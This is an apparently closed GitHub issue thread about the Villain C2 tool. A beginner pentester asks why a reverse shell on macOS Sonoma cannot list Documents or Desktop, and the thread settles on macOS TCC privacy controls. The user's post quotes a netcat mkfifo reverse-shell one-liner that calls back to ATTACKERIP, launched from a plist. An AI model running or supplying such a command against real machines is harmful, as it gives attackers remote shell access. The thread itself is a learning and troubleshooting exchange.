Closed OllyHill closed 3 months ago
t3l3machus
commented
3 months ago Hi, sorry for the delay.
The "operation not permitted." must be due to macOS security restrictions. Are you running the commands as root? Not an expert with macOS systems but this is probably due to SIP: https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection
OllyHill
commented
3 months ago Thank you mate for getting back to me. I did some more research and seems like it's due to TCC from macOS security. If I'm putting it down correctly, macOS has protected folders that the user must authorize access. This could be the desktop or documents, but not every folder has this issue which is what was confusing me earlier. I do not fancy this as a villain issue at all and just user error/novice. This can be closed.
Thanks for a great piece of software mate.
Hi mate, I'm getting started with pentesting and C2s and looking to gain experience. My target is macOS. I have Sonoma 14.5 with default settings.
To get started, I used the following on the target that I found on revshells.com. This is being run under /bin/bash/ from a plist:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKERIP 4443 >/tmp/fThis connected back to villain just fine and I get a shell. In the shell, if I navigate to Documents or Desktop and ls, I receive "operation not permitted." Is this due to how the payload is being run on macOS or due to macOS security? Or due to some villain settings? I tried the nohup python3 command that villian generates, but the target macOS machine does not have python3 installed by default and I am trying to keep macOS as default as possible to learn from. Sorry mate if this is too basic, but just trying to get involved in cybersecurity.